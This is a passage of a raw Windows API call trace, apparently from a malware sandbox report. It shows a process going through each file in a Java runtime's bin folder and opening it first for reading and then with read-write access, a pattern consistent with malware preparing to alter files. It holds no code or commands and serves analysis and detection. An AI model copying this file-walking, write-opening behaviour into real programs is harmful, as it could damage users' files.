lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\npt.dll", lpUsedDefaultChar=0x0) returned 47 [0093.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0093.487] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.487] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0093.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0093.487] AreFileApisANSI () returned 1 [0093.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e110, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0093.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71620 [0093.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e110, cbMultiByte=-1, lpWideCharStr=0x71620, cchWideChar=47 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\npt.dll") returned 47 [0093.487] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\npt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\npt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.487] GetFileType (hFile=0x360) returned 0x1 [0093.487] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0093.487] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0093.487] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0093.488] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0093.488] CloseHandle (hObject=0x360) returned 1 [0093.488] AreFileApisANSI () returned 1 [0093.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e110, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0093.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71b00 [0093.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e110, cbMultiByte=-1, lpWideCharStr=0x71b00, cchWideChar=47 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\npt.dll") returned 47 [0093.488] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\npt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\npt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.488] GetFileType (hFile=0x360) returned 0x1 [0093.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0093.488] CloseHandle (hObject=0x360) returned 1 [0093.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0093.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0093.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.489] AreFileApisANSI () returned 1 [0093.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e110, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0093.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x717c0 [0093.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e110, cbMultiByte=-1, lpWideCharStr=0x717c0, cchWideChar=47 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\npt.dll") returned 47 [0093.489] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\npt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\npt.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4a40)) returned 1 [0093.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0093.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0093.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0093.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0093.489] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.489] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.489] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="orbd.exe", cAlternateFileName="")) returned 1 [0093.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0093.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0093.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0093.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0093.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0093.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0093.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0093.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0093.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0093.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0093.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0093.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0093.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0093.490] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.490] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.490] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.490] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0093.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.490] AreFileApisANSI () returned 1 [0093.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\orbd.exe", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\orbd.exe", lpUsedDefaultChar=0x0) returned 48 [0093.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0093.490] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.490] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0093.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0093.490] AreFileApisANSI () returned 1 [0093.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0093.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0093.491] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=48 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\orbd.exe") returned 48 [0093.491] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\orbd.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\orbd.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.619] GetFileType (hFile=0x360) returned 0x1 [0093.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0093.619] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0093.619] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0093.620] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0093.620] CloseHandle (hObject=0x360) returned 1 [0093.620] AreFileApisANSI () returned 1 [0093.620] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0093.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0093.620] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x71758, cchWideChar=48 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\orbd.exe") returned 48 [0093.620] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\orbd.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\orbd.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.620] GetFileType (hFile=0x360) returned 0x1 [0093.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0093.620] CloseHandle (hObject=0x360) returned 1 [0093.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.621] AreFileApisANSI () returned 1 [0093.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0093.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0093.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=48 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\orbd.exe") returned 48 [0093.622] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\orbd.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\orbd.exe"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040)) returned 1 [0093.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0093.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0093.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0093.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0093.622] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.622] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.622] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="pack200.exe", cAlternateFileName="")) returned 1 [0093.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0093.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0093.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0093.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0093.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0093.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0093.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0093.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0093.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0093.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69db0 [0093.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0093.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0093.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0093.622] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.622] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.622] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.622] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0093.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.623] AreFileApisANSI () returned 1 [0093.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\pack200.exe", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\pack200.exe", lpUsedDefaultChar=0x0) returned 51 [0093.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0093.623] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.623] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0093.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0093.623] AreFileApisANSI () returned 1 [0093.623] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0093.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x46198 [0093.623] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x46198, cchWideChar=51 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\pack200.exe") returned 51 [0093.623] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\pack200.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\pack200.exe"), 